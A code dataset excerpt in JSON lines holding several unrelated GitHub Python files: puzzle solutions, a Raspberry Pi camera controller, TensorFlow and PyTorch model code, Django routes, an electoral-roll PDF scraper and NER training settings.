attrib\n\n tape = [ ('children', 3),\n ('cats', 7),\n ('samoyeds', 2),\n ('pomeranians', 3),\n ('akitas', 0),\n ('vizslas', 0),\n ('goldfish', 5),\n ('trees', 3),\n ('cars', 2),\n ('perfumes', 1) ]\n\n ##\n # Part 1\n ##\n\n realSue = 'Not found'\n\n for key, val in sues.items():\n for item in tape:\n if item[ 0 ] not in val.keys():\n continue\n elif val[ item[ 0 ] ] != item[ 1 ]:\n break\n else:\n realSue = key\n\n print( f\"Part 1 answer: {realSue}\" )\n\n ##\n # Part 2\n ##\n\n realSue = 'Not found'\n\n for key, val in sues.items():\n for item in tape:\n if item[ 0 ] not in val.keys():\n continue\n elif item[ 0 ] == 'cats' or item[ 0 ] == 'trees':\n if val[ item[ 0 ] ] <= item[ 1 ]:\n break\n elif item[ 0 ] == 'pomeranians' or item[ 0 ] == 'goldfish':\n if val[ item[ 0 ] ] >= item[ 1 ]:\n break\n elif val[ item[ 0 ] ] != item[ 1 ]:\n break\n else:\n realSue = key\n\n print( f\"Part 2 answer: {realSue}\" )\n\n\nif __name__ == \"__main__\":\n main( argv=sys.argv )","repo_name":"cstumps/AOC","sub_path":"AOC-2015/day16.py","file_name":"day16.py","file_ext":"py","file_size_in_byte":4134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"35361728361","text":"import RPi.GPIO as GPIO\nimport time\nimport cv2\nimport logging\n\n\nclass CameraControl:\n # Camera Servo Pin\n Camera_ServoPin = 11 # S2\n Camera_ServoPinB = 9 # S3\n cap: any\n search_direction = 1\n\n def __init__(self, camera_id, width, height, camera_x_angle, camera_y_angle) -> None:\n self.camera_id = camera_id\n self.width = width\n self.height = height\n self.camera_x_angle = camera_x_angle\n self.camera_y_angle = camera_y_angle\n pass\n\n def init(self):\n logging.info(\"start initing camera control [width: %s, height: %s, camera X angle: %s, camera Y angle: %s]\",\n self.width, self.height, self.camera_x_angle, self.camera_y_angle)\n\n GPIO.setup(self.Camera_ServoPin, GPIO.OUT)\n GPIO.setup(self.Camera_ServoPinB, GPIO.OUT)\n\n time.sleep(2)\n\n count = 5\n while count > 0:\n self.servo_control(self.camera_x_angle, self.camera_y_angle)\n count -= 1\n\n # Start capturing video input from the camera\n self.cap = cv2.VideoCapture(self.camera_id)\n self.cap.set(cv2.CAP_PROP_FRAME_WIDTH, self.width)\n self.cap.set(cv2.CAP_PROP_FRAME_HEIGHT, self.height)\n\n logging.info(\"complete initing camera control\")\n\n def adjust_lower(self):\n if self.camera_y_angle > 58:\n self.camera_y_angle -= 3\n logging.info(\"adjust camera lower: %s\", self.camera_y_angle)\n self.servo_pulse(self.Camera_ServoPinB, self.camera_y_angle)\n \n def search(self):\n if self.search_direction == 1:\n if self.camera_x_angle < 150:\n self.camera_x_angle += 5\n else:\n self.search_direction = -1\n else:\n if self.camera_x_angle > 30:\n self.camera_x_angle -= 5\n else:\n self.search_direction = 1\n logging.info(\"search... direction: %s, angle: %s\", self.search_direction, self.camera_x_angle)\n self.servo_pulse(self.Camera_ServoPin, self.camera_x_angle)\n\n def current_x_angle(self):\n return self.camera_x_angle\n\n def reset_x_angle(self):\n self.servo_pulse(self.Camera_ServoPin, 90)\n\n def adjust_left(self):\n if self.camera_x_angle < 170:\n self.camera_x_angle += 3\n logging.info(\"adjust camera left: %s\", self.camera_x_angle)\n self.servo_pulse(self.Camera_ServoPin, self.camera_x_angle)\n\n def adjust_right(self):\n if self.camera_x_angle > 10:\n self.camera_x_angle -= 5\n logging.info(\"adjust camera right: %s\", self.camera_x_angle)\n self.servo_pulse(self.Camera_ServoPin, self.camera_x_angle)\n\n # define a pulse function, generate pwm using simulation way\n # base pulse 20ms, maintain high level range within 0.5-2.5ms to control 0-180 angle\n def servo_pulse(self, servo, angle):\n pulsewidth = (angle * 11) + 500\n logging.debug(\"camera pulse: \" + str(servo) +\n \", angle: \" + str(pulsewidth))\n GPIO.output(servo, GPIO.HIGH)\n time.sleep(pulsewidth/1000000.0)\n GPIO.output(servo, GPIO.LOW)\n time.sleep(20.0/1000-pulsewidth/1000000.0)\n\n def servo_control(self, angle_1, angle_2):\n self.servo_pulse(self.Camera_ServoPin, angle_1)\n self.servo_pulse(self.Camera_ServoPinB, angle_2)\n\n def read_image(self):\n if self.cap.isOpened():\n return self.cap.read()\n else:\n return False, None\n\n def release(self):\n if self.cap:\n self.cap.release()","repo_name":"twinssbc/travel-robot","sub_path":"camera_control.py","file_name":"camera_control.py","file_ext":"py","file_size_in_byte":3568,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"95"} +{"seq_id":"3352979968","text":"from adict import adict\nimport tensorflow as tf\n\n# From homework 5\ndef weight_variable(shape):\n return tf.get_variable('w', shape)\n\ndef bias_variable(shape):\n return tf.get_variable('b', shape)\n\ndef conv2d(input_mat, output_size, kernel_height, kernel_width, scope):\n with tf.variable_scope(scope):\n input_size = input_mat.get_shape()[-1]\n weight_shape = [kernel_height, kernel_width, input_size, output_size]\n w = weight_variable(weight_shape)\n b = bias_variable([output_size])\n return tf.nn.conv2d(input_mat, w, strides=[1, 1, 1, 1], padding='VALID') + b\n\n# just simply linear transform (X*W+B)\ndef linear_transform(input_mat, output_size, scope):\n with tf.variable_scope(scope):\n input_size = input_mat.get_shape().as_list()[1]\n weight_shape = [output_size, input_size]\n w = tf.get_variable(\"w\", weight_shape)\n b = tf.get_variable(\"b\", [output_size])\n\n # w = weight_variable([output_size, input_size])\n # b = bias_variable([output_size])\n return tf.matmul(input_mat, tf.transpose(w)) + b\n\n\ndef time_delayed_network(input_mat, scope):\n with tf.variable_scope(scope):\n # from the paper, features\n patch_sizes = [ 1, 2, 3, 4, 5, 6, 7]\n num_channels = [50, 100, 150, 200, 200, 200, 200]\n\n max_word_length = input_mat.get_shape()[1]\n input_mat = tf.expand_dims(input_mat, 1)\n layers = []\n for i in range(len(patch_sizes)):\n patch_size, output_size = patch_sizes[i], num_channels[i]\n new_length = max_word_length - patch_size + 1\n # house keeping conv and pool\n conv = conv2d(input_mat, output_size, 1, patch_size, \"patch%d\" % patch_size)\n pool_w = [1, 1, new_length, 1]\n h_pool = tf.nn.max_pool(tf.tanh(conv), pool_w, [1, 1, 1, 1], 'VALID')\n layers.append(tf.squeeze(h_pool, [1, 2]))\n\n return tf.concat(1, layers)\n\n\ndef char_aware_network(char_level_set_size, \n word_level_set_size,\n batch_sz=20,\n num_unrolls=35,\n dropout=0.0,\n max_word_length=65):\n\n input_mat = tf.placeholder(tf.int32, shape=[batch_sz, num_unrolls, max_word_length], name=\"input\")\n\n # embedding\n with tf.variable_scope('embed'):\n embedding_size=15\n char_level_shape = [char_level_set_size, embedding_size]\n embedding_char_level = tf.get_variable('embedding_char_level', char_level_shape)\n scatter_shape = [1, embedding_size]\n scatter_char_embed = tf.scatter_update(embedding_char_level, [0], tf.constant(0.0, shape=scatter_shape))\n embedding_shape = [-1, max_word_length, embedding_size]\n embedding_input_mat = tf.reshape(tf.nn.embedding_lookup(embedding_char_level, input_mat), embedding_shape)\n\n\n # convolutions\n input_to_network = time_delayed_network(embedding_input_mat, \"time_delayed\")\n\n # highway (refer to the paper)\n def highway_transform(input_mat, output_size, num_layers, scope):\n with tf.variable_scope(scope):\n b = -2.0\n for i in range(num_layers):\n # G: non-linearilty, e.g. relu\n non_linearity = tf.nn.relu(linear_transform(input_mat, output_size, scope='hw_g%d' % i))\n\n # t: transform gate\n transform = tf.sigmoid(linear_transform(input_mat, output_size, scope='hw_t%d' % i) + b)\n\n # t*g: what non-linearility info to transform\n # (1-t)*input: what info to carry (carry gate)\n output = transform * non_linearity + (1.0 - transform) * input_mat\n\n input_mat = output\n\n return output\n\n input_to_network = highway_transform(input_to_network, input_to_network.get_shape()[-1], num_layers=2, scope='highway')\n\n # LSTM\n with tf.variable_scope('LSTM'):\n rnn_cell_size = 650\n rnn_layer_size = 2\n\n cell = tf.nn.rnn_cell.BasicLSTMCell(rnn_cell_size, state_is_tuple=True, forget_bias=0.0)\n\n # dropout\n if dropout > 0.0:\n keep_prob = 1.0-dropout\n cell = tf.nn.rnn_cell.DropoutWrapper(cell, output_keep_prob=keep_prob)\n\n # multi layer\n cell = tf.nn.rnn_cell.MultiRNNCell([cell] * rnn_layer_size, state_is_tuple=True)\n\n state_init = cell.zero_state(batch_sz, dtype=tf.float32)\n\n input_to_network = tf.reshape(input_to_network, [batch_sz, num_unrolls, -1])\n input_to_network2 = [tf.squeeze(x, [1]) for x in tf.split(1, num_unrolls, input_to_network)]\n\n outputs, state_end = tf.nn.rnn(cell, input_to_network2, initial_state=state_init, dtype=tf.float32)\n\n logits = []\n with tf.variable_scope('word_embed_linear') as scope:\n for idx, output in enumerate(outputs):\n if idx > 0:\n scope.reuse_variables()\n logits.append(linear_transform(output, word_level_set_size, \"scope_linear_transform\"))\n\n return adict(\n input = input_mat,\n scatter_char_embed=scatter_char_embed,\n state_init=state_init,\n state_end=state_end,\n input_to_network=input_to_network,\n rnn_outputs=outputs,\n embedding_input_mat=embedding_input_mat,\n logits = logits\n )\n\n\ndef cost(logits, batch_sz, num_unrolls):\n with tf.variable_scope('cost'):\n shape = [batch_sz, num_unrolls]\n target_var = tf.placeholder(tf.int64, shape, name='target_var')\n target_list = [tf.squeeze(d, [1]) for d in tf.split(1, num_unrolls, target_var)]\n loss_penalty = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(logits, target_list), name='loss_penalty')\n return adict(\n target_var=target_var,\n loss=loss_penalty\n )\n\n\n\ndef training_graph(loss, learning_rate):\n\n with tf.variable_scope('stochastic'):\n glob_step = tf.Variable(0, name='glob_step', trainable=False)\n learning_rate = tf.Variable(learning_rate, trainable=False, name='learning_rate')\n trainable_vars = tf.trainable_variables()\n grads, glob_norm = tf.clip_by_global_norm(tf.gradients(loss, trainable_vars), 5.0)\n\n optimizer = tf.train.GradientDescentOptimizer(learning_rate)\n train_step = optimizer.apply_gradients(zip(grads, trainable_vars), global_step=glob_step)\n\n return adict(\n learning_rate=learning_rate,\n train_step=train_step,\n glob_norm=glob_norm,\n glob_step=glob_step)\n","repo_name":"baizhima/csci2950-char-level-model","sub_path":"char-aware-model/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":6509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"39477883108","text":"\nfrom django.urls import path, include\nfrom django.views.generic.base import RedirectView\n\nfrom .views import index, by_department, VacationCreateView, EmployeeCreateView, EmployeeUpdateView, success, \\\n DepartmentCreateView, EmployeeDeleteView, DepartmentDeleteView, VacationDeleteView, recalculate_department, \\\n export_t7_department, export_t7_all, bootstrap_test\n\napp_name = 'vacations'\n\nurlpatterns = [\n #path('bootstrap_test', bootstrap_test, name='test'),\n path('', index, name='index'),\n path('export_t7/', export_t7_all, name='export_t7_all'),\n path('department/', RedirectView.as_view(pattern_name='vacations:index', permanent=False), name='index_redirect'),\n path('department/add/', DepartmentCreateView.as_view(), name='add_department'),\n path('department//delete/', DepartmentDeleteView.as_view(), name='department_delete_form'),\n path('department//export_t7/', export_t7_department, name='export_t7_department'),\n path('department//recalculate', recalculate_department, name='recalculate_department'),\n path('department//', by_department, name='by_department'),\n path('department//add_employee/', EmployeeCreateView.as_view(), name='add_employee'),\n path('employee//edit/', EmployeeUpdateView.as_view(), name='employee_update_form'),\n path('employee//delete/', EmployeeDeleteView.as_view(), name='employee_delete_form'),\n path('employee//', VacationCreateView.as_view(), name='details'),\n path('vacation//delete/', VacationDeleteView.as_view(), name='vacation_delete_form'),\n\n]\n","repo_name":"SipakovV/vacation_scheduler","sub_path":"vacations/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"22967499691","text":"'''\nResNet in PyTorch.\nReference:\n[1] Kaiming He, Xiangyu Zhang, Shaoqing Ren, Jian Sun\n Deep Residual Learning for Image Recognition. arXiv:1512.03385\n'''\nimport os\nimport math\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom torch.autograd import Variable\nclass BasicBlock(nn.Module):\n\n expansion = 1\n\n def __init__(self, in_channels, out_channels, stride=1):\n super(BasicBlock, self).__init__()\n self.features = nn.Sequential(\n nn.Conv2d(in_channels, out_channels, kernel_size=3, stride=stride, padding=1, bias=False),\n nn.BatchNorm2d(out_channels),\n nn.ReLU(True),\n nn.Conv2d(out_channels, out_channels, kernel_size=3, stride=1, padding=1, bias=False),\n nn.BatchNorm2d(out_channels)\n )\n \n self.shortcut = nn.Sequential()\n if stride != 1 or in_channels != self.expansion * out_channels:\n self.shortcut = nn.Sequential(\n nn.Conv2d(in_channels, self.expansion * out_channels, kernel_size=1, stride=stride, bias=False),\n nn.BatchNorm2d(self.expansion * out_channels),\n )\n\n def forward(self, x):\n out = self.features(x)\n # print(out.shape)\n out += self.shortcut(x)\n out = torch.relu(out)\n return out\n\n\nclass Bottleneck(nn.Module):\n\n expansion = 4\n\n def __init__(self, in_channels, zip_channels, stride=1):\n super(Bottleneck, self).__init__()\n out_channels = self.expansion * zip_channels\n self.features = nn.Sequential(\n nn.Conv2d(in_channels, zip_channels, kernel_size=1, bias=False),\n nn.BatchNorm2d(zip_channels),\n nn.ReLU(inplace=True),\n nn.Conv2d(zip_channels, zip_channels, kernel_size=3, stride=stride, padding=1, bias=False),\n nn.BatchNorm2d(zip_channels),\n nn.ReLU(inplace=True),\n nn.Conv2d(zip_channels, out_channels, kernel_size=1, bias=False),\n nn.BatchNorm2d(out_channels)\n )\n self.shortcut = nn.Sequential()\n if stride != 1 or in_channels != out_channels:\n self.shortcut = nn.Sequential(\n nn.Conv2d(in_channels, out_channels, kernel_size=1, stride=stride, bias=False),\n nn.BatchNorm2d(out_channels)\n )\n\n def forward(self, x):\n out = self.features(x)\n # print(out.shape)\n out += self.shortcut(x)\n out = torch.relu(out)\n return out\n\n\nclass ResNet(nn.Module):\n\n def __init__(self, block, num_blocks, num_classes=10, verbose=False, init_weights=True):\n super(ResNet, self).__init__()\n self.verbose = verbose\n self.in_channels = 64\n self.features = nn.Sequential(\n nn.Conv2d(3, 64, kernel_size=3, stride=1, padding=1, bias=False),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True)\n )\n \n self.layer1 = self._make_layer(block, 64, num_blocks[0], stride=1)\n self.layer2 = self._make_layer(block, 128, num_blocks[1], stride=2)\n self.layer3 = self._make_layer(block, 256, num_blocks[2], stride=2)\n self.layer4 = self._make_layer(block, 512, num_blocks[3], stride=2)\n\n self.avg_pool = nn.AdaptiveAvgPool2d((1, 1))\n self.classifer = nn.Linear(512 * block.expansion, num_classes)\n\n if init_weights:\n self._initialize_weights()\n\n def _make_layer(self, block, out_channels, num_blocks, stride):\n strides = [stride] + [1] * (num_blocks - 1)\n layers = []\n for stride in strides:\n layers.append(block(self.in_channels, out_channels, stride))\n self.in_channels = out_channels * block.expansion\n return nn.Sequential(*layers)\n\n def forward(self, x,threshold=1e9,need_penultimate=0):\n out = self.features(x)\n if self.verbose:\n print('block 1 output: {}'.format(out.shape))\n out = self.layer1(out)\n if self.verbose:\n print('block 2 output: {}'.format(out.shape))\n out = self.layer2(out)\n if self.verbose:\n print('block 3 output: {}'.format(out.shape))\n out = self.layer3(out)\n third_layer_output = self.avg_pool(out)\n third_layer_output = torch.flatten(third_layer_output, 1)\n\n if self.verbose:\n print('block 4 output: {}'.format(out.shape))\n out = self.layer4(out)\n if self.verbose:\n print('block 5 output: {}'.format(out.shape))\n\n out = self.avg_pool(out)\n if threshold != 1e9:\n out = out.clip(max=threshold)\n out = out.view(out.size(0), -1)\n penultimate_layer = out\n out = self.classifer(out)\n if need_penultimate==4:\n return out,penultimate_layer\n elif need_penultimate==3:\n return out,third_layer_output\n else:\n return out\n\n# # function to extact the multiple features\n# def feature_list(self, x):\n# out_list = []\n# out = self.features(x)\n# out_list.append(out)\n# out = self.layer1(out)\n# out_list.append(out)\n# out = self.layer2(out)\n# out_list.append(out)\n# out = self.layer3(out)\n# out_list.append(out)\n# out = self.layer4(out)\n# out_list.append(out)\n# out = self.avg_pool(out)\n# out = out.view(out.size(0), -1)\n# y = self.classifer(out)\n# return y, out_list\n \n# # function to extact a specific feature\n# def intermediate_forward(self, x, layer_index):\n# out = self.features(x)\n# if layer_index == 1:\n# out = self.layer1(out)\n# elif layer_index == 2:\n# out = self.layer1(out)\n# out = self.layer2(out)\n# elif layer_index == 3:\n# out = self.layer1(out)\n# out = self.layer2(out)\n# out = self.layer3(out)\n# elif layer_index == 4:\n# out = self.layer1(out)\n# out = self.layer2(out)\n# out = self.layer3(out)\n# out = self.layer4(out) \n# return out\n\n# # function to extact the penultimate features\n# def penultimate_forward(self, x):\n out = self.features(x)\n out = self.layer1(out)\n out = self.layer2(out)\n out = self.layer3(out)\n penultimate = self.layer4(out)\n out = self.avg_pool(out)\n out = out.view(out.size(0), -1)\n y = self.classifer(out)\n return y, penultimate\n\n def _initialize_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n if m.bias is not None:\n nn.init.constant_(m.bias, 0)\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n elif isinstance(m, nn.Linear):\n nn.init.normal_(m.weight, 0, 0.01)\n nn.init.constant_(m.bias, 0)\n\n\ndef ResNet18(verbose=False,**kwargs):\n return ResNet(BasicBlock, [2, 2, 2, 2], verbose=verbose,**kwargs)\n\n\ndef ResNet34(verbose=False,**kwargs):\n return ResNet(BasicBlock, [3, 4, 6, 3], verbose=verbose,**kwargs)\n\n\ndef ResNet50(verbose=False):\n return ResNet(Bottleneck, [3, 4, 6, 3], verbose=verbose)\n\n\ndef ResNet101(verbose=False):\n return ResNet(Bottleneck, [3, 4, 23, 3], verbose=verbose)\n\n\ndef ResNet152(verbose=False):\n return ResNet(Bottleneck, [3, 8, 36, 3], verbose=verbose)\n\n\n","repo_name":"zjs975584714/SHE_ood_detection","sub_path":"models/ResNet.py","file_name":"ResNet.py","file_ext":"py","file_size_in_byte":7605,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"95"} +{"seq_id":"34655369333","text":"# AOJ 0612\r\n# http://judge.u-aizu.ac.jp/onlinejudge/description.jsp?id=0612\r\n\r\ncastle = []\r\ncmp = []\r\nh = w = 0\r\nleft = 0\r\n\r\ndef initial():\r\n global h, w, left\r\n left = h * w\r\n for i in range(0, h):\r\n left -= castle[i].count(0)\r\n for i in range(0, h):\r\n c = []\r\n for j in range(0, w):\r\n if castle[i][j] == 0:\r\n c.append(-99)\r\n else:\r\n a = castle[i - 1][j - 1:j + 2].count(0)\r\n a += castle[i][j - 1: j + 2].count(0)\r\n a += castle[i + 1][j - 1: j + 2].count(0)\r\n c.append(a)\r\n cmp.append(c)\r\n\r\ndef wave(xy):\r\n global h, w, left\r\n z = []\r\n xy1 = []\r\n for i, j in xy:\r\n if castle[i][j] > 0 and castle[i][j] <= cmp[i][j]:\r\n castle[i][j] = 0\r\n left -= 1\r\n z.append((i, j))\r\n for i, j in z:\r\n cmp[i - 1][j - 1] += 1\r\n cmp[i - 1][j ] += 1\r\n cmp[i - 1][j + 1] += 1\r\n cmp[i ][j - 1] += 1\r\n cmp[i ][j ] = -99\r\n cmp[i ][j + 1] += 1\r\n cmp[i + 1][j - 1] += 1\r\n cmp[i + 1][j ] += 1\r\n cmp[i + 1][j + 1] += 1\r\n y = [(i - 1, j - 1), (i - 1, j), (i - 1, j + 1),\r\n (i, j - 1), (i, j + 1),\r\n (i + 1, j - 1), (i + 1, j), (i + 1, j + 1)]\r\n xy1 += y\r\n return xy1\r\n\r\ndef solve():\r\n global h, w, left\r\n initial()\r\n p_left = left + 1\r\n count = 0\r\n xy = [ (i, j) for j in range(1, w) for i in range(1, h)]\r\n while True:\r\n count += 1\r\n xy1 = wave(xy)\r\n if p_left == left:\r\n break\r\n p_left = left\r\n xy = xy1\r\n return count - 1\r\n\r\n#f = open(\"python\\input_0612-2.txt\")\r\nf = open(\"python\\in.txt\")\r\nh, w = map(int, f.readline().split())\r\n#h, w = map(int, input().split())\r\n\r\nfor _ in range(0, h):\r\n c = f.readline().strip()\r\n #c = input().strip()\r\n castle.append([int(x) if x != '.' else 0 for x in c])\r\nans = solve()\r\nprint(ans)\r\n","repo_name":"hy17kwkj/python","sub_path":"AizuOnlineJudge/aoj0612.py","file_name":"aoj0612.py","file_ext":"py","file_size_in_byte":1988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"41697991080","text":"\nfrom os import getenv, environ\nfrom os.path import exists, join, expanduser\nfrom random import seed, sample, randint, uniform\nfrom subprocess import run\n\nfrom tqdm.notebook import tqdm as log_progress\n\nimport torch\nfrom torch import optim\n\nfrom naeval.ner.datasets import (\n load_factru,\n load_ne5,\n)\n\nfrom slovnet.s3 import S3\nfrom slovnet.io import (\n format_jl,\n parse_jl,\n\n load_gz_lines,\n dump_gz_lines\n)\nfrom slovnet.board import (\n TensorBoard,\n LogBoard,\n MultiBoard\n)\nfrom slovnet.const import (\n TRAIN, TEST,\n PER, LOC, ORG,\n CUDA0,\n)\nfrom slovnet.token import tokenize\n\nfrom slovnet.model.bert import (\n RuBERTConfig,\n BERTEmbedding,\n BERTEncoder,\n BERTNERHead,\n BERTNER\n)\nfrom slovnet.markup import (\n SpanMarkup,\n show_span_markup\n)\nfrom slovnet.vocab import BERTVocab, BIOTagsVocab\nfrom slovnet.encoders.bert import BERTNERTrainEncoder, BERTInferEncoder\nfrom slovnet.score import (\n NERBatchScore,\n NERScoreMeter,\n score_ner_batch\n)\nfrom slovnet.mask import (\n Masked,\n split_masked,\n pad_masked\n)\n\nfrom slovnet.infer.bert import BERTNERInfer, BERTTagDecoder\n\nDATA_DIR = 'data'\nMODEL_DIR = 'model'\nBERT_DIR = 'bert'\n\nRAW_DIR = join(DATA_DIR, 'raw')\n\nCORUS_NE5 = join(RAW_DIR, 'Collection5')\nCORUS_FACTRU = join(RAW_DIR, 'factRuEval-2016-master')\n\nNE5 = join(DATA_DIR, 'ne5.jl.gz')\nFACTRU = join(DATA_DIR, 'factru.jl.gz')\n\nS3_DIR = '02_bert_ner'\nS3_NE5 = join(S3_DIR, NE5)\nS3_FACTRU = join(S3_DIR, FACTRU)\n\nVOCAB = 'vocab.txt'\nEMB = 'emb.pt'\nENCODER = 'encoder.pt'\nNER = 'ner.pt'\n\nBERT_VOCAB = join(BERT_DIR, VOCAB)\nBERT_EMB = join(BERT_DIR, EMB)\nBERT_ENCODER = join(BERT_DIR, ENCODER)\n\nS3_RUBERT_DIR = '01_bert_news/rubert'\nS3_MLM_DIR = '01_bert_news/model'\nS3_BERT_VOCAB = join(S3_RUBERT_DIR, VOCAB)\nS3_BERT_EMB = join(S3_MLM_DIR, EMB)\nS3_BERT_ENCODER = join(S3_MLM_DIR, ENCODER)\n\nMODEL_ENCODER = join(MODEL_DIR, ENCODER)\nMODEL_NER = join(MODEL_DIR, NER)\n\nS3_MODEL_ENCODER = join(S3_DIR, MODEL_ENCODER)\nS3_MODEL_NER = join(S3_DIR, MODEL_NER)\n\nBOARD_NAME = getenv('board_name', '02_bert_ner')\nRUNS_DIR = 'runs'\n\nTRAIN_BOARD = '01_train'\nTEST_BOARD = '02_test'\n\nSEED = int(getenv('seed', 72))\nDEVICE = getenv('device', CUDA0)\nBERT_LR = float(getenv('bert_lr', 0.000045))\nLR = float(getenv('lr', 0.0075))\nLR_GAMMA = float(getenv('lr_gamma', 0.45))\nEPOCHS = int(getenv('epochs', 5))\n\nSEQ_LEN = int(getenv('SEQ_LEN', 256))\nBATCH_SIZE = int(getenv('BATCH_SIZE', 64))\n\n#####################\n#\n# CUSTOM TAGS TUNING\n#\n############### START\n\nCUSTOM_TUNING = False # Set this flag to true in order to use your custom dataset and tags\nCUSTOM_TEXTS = join(DATA_DIR, 'custom-dataset.jl.gz') # Put your own data into the data dir\nTAGS = ['CUSTOM-TAG'] if CUSTOM_TUNING else [PER, LOC, ORG] # List all your custom tags \n\n################# END\n\n\ndef process_batch(model, criterion, batch):\n input, target = batch\n\n pred = model(input.value)\n pred = pad_masked(pred, input.mask)\n mask = pad_masked(input.mask, input.mask)\n\n loss = criterion(pred, target.value, target.mask)\n\n pred = Masked(pred, mask)\n return batch.processed(loss, pred)\n","repo_name":"natasha/slovnet","sub_path":"scripts/02_bert_ner/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3133,"program_lang":"python","lang":"en","doc_type":"code","stars":197,"dataset":"github-code","pt":"95"} +{"seq_id":"17118621879","text":"# -*- coding:utf-8 _*_\nclass Solution:\n def minDistance(self, word1, word2):\n \"\"\"\n :type word1: str\n :type word2: str\n :rtype: int\n \"\"\"\n if word1=='':\n return len(word2)\n if word2=='':\n return len(word1)\n len1=len(word1)\n len2=len(word2)\n table=[]\n\n for i in range(len1):\n table.append([max(len1,len2)]*len2)\n add=0\n for i in range(len2):\n if word1[-1]!=word2[len2-1-i]:\n add+=1\n table[0][i]=add\n else:\n table[0][i]=add\n break\n t=i\n for i in range(t+1,len2):\n add+=1\n table[0][i]=add\n for i in range(1,len1):\n for j in range(len2):\n tem1=word1[-(1+i):]\n tem2=word2[-(1+j):]\n table[i][j]=self.check(tem1,tem2,table)\n return table[-1][-1]\n\n\n\n def check(self,word1,word2,table):\n len1=len(word1)\n len2=len(word2)\n if len2==1:\n if word2 in word1:\n return len1-1\n else:\n return len1\n\n t=0\n for i in range(min(len1, len2)):\n if word1[i] == word2[i]:\n t += 1\n else:\n break\n word1 = word1[t:]\n word2 = word2[t:]\n if word2=='':\n return len(word1)\n if word1=='':\n return len(word2)\n if t>0:\n return table[len1-1-t][len2-1-t]\n else:\n\n return 1+min(\n table[len1-2][len2-1],\n table[len1-1][len2-2],\n table[len1-2][len2-2]\n )\no=Solution()\nprint(o.minDistance(\"invention\",\n\"\"))","repo_name":"hemxzp/leetcode","sub_path":"72. Edit Distance.py","file_name":"72. Edit Distance.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"13800606410","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Dec 14 10:26:57 2017\n\n@author: dhingratul\n\"\"\"\n\nimport time\nfrom selenium.webdriver.support.ui import Select\nimport urllib\nimport sys\nsys.path.insert(0, '../tools/')\nimport utils\n\n\ndef getDistrict(m_url, element):\n driver = utils.getDriver(m_url)\n mySelect_D = Select(driver.find_element_by_id(element))\n num_D = len(mySelect_D.options) # Start from 1, 0 -- Select\n return driver, mySelect_D, num_D\n\n\ndef getConstt(m_url, i, element):\n driver, mySelect_D, num_D = getDistrict(m_url, 'mainContent_DistrictList')\n mySelect_D.options[i].click()\n mySelect_C = Select(driver.find_element_by_id(element))\n return driver, mySelect_D, mySelect_C\n\n\nm_url = 'https://103.23.150.75/Search/SearchPDF.aspx'\nmdir = '../data/Maharashtra/'\ndriver, mySelect_D, num_D = getDistrict(m_url, 'mainContent_DistrictList')\nfor i in range(1, num_D):\n if i != 1:\n driver, mySelect_D, _ = getDistrict(m_url, 'mainContent_DistrictList')\n mySelect_D.options[i].click()\n # Select Constt.\n mySelect_C = Select(driver.find_element_by_id('mainContent_AssemblyList'))\n num_C = len(mySelect_C.options)\n for j in range(1, num_C):\n C_name = mySelect_C.options[j].text\n C_name = C_name.split(\" - \")[0]\n mySelect_C.options[j].click()\n mySelect_P = Select(driver.find_element_by_id('mainContent_PartList'))\n num_P = len(mySelect_P.options)\n links = []\n names = []\n for k in range(1, num_P):\n print('\\n', i, j, k)\n base_url = 'https://103.23.150.75/searchpdf/pdf/'\n p1 = format(int(C_name), '03d')\n p2 = format(int(mySelect_P.options[k].text.split(' - ')[0]), '04d')\n prefix = 'A{}/A{}{}.pdf'.format(p1, p1, p2)\n url = base_url + prefix\n fid = prefix.replace(\"/\", \"_\")\n try:\n #flag = utils.download_file_W(url, mdir, fid, True)\n flag = utils.download_file_R(url, mdir, fid, \"Maharashtra.txt\")\n if flag == 0:\n with open(\"Maharashtra.txt\", \"a\") as myfile:\n myfile.write(url + '\\n')\n except urllib.error.HTTPError:\n with open(\"Maharashtra.txt\", \"a\") as myfile:\n myfile.write(url + '\\n')\n driver.quit()\n time.sleep(10)\n driver, mySelect_D, mySelect_C = getConstt(m_url, i, 'mainContent_AssemblyList')\n\n","repo_name":"in-rolls/electoral_rolls","sub_path":"maharashtra/maharashtra.py","file_name":"maharashtra.py","file_ext":"py","file_size_in_byte":2469,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"95"} +{"seq_id":"25566938105","text":"# Imports from python.\nimport csv\nfrom datetime import datetime\nimport os\nimport pickle\n\n\n# Imports from other dependencies.\nimport us\n\n\nPWD = os.path.abspath(os.path.dirname(__file__))\nDB = os.path.join(PWD, \"db\")\nELECTIONS_DIR = os.path.join(DB, \"elections\")\nPKL_DIR = os.path.join(PWD, \"elections/data/\")\n\n# GET YEARS\nYEARS = list(os.walk(ELECTIONS_DIR))[0][1]\n\n\ndef read_csv_to_dict(path):\n with open(path) as csvfile:\n reader = csv.DictReader(csvfile)\n return [row for row in reader]\n\n\ndef cast_dates(obj):\n for key in obj:\n if (key[-5:] == \"_date\" or key[-9:] == \"_deadline\") and obj[key]:\n obj[key] = datetime.strptime(obj[key], \"%Y-%m-%d\")\n return obj\n\n\ndef cast_bools(obj):\n 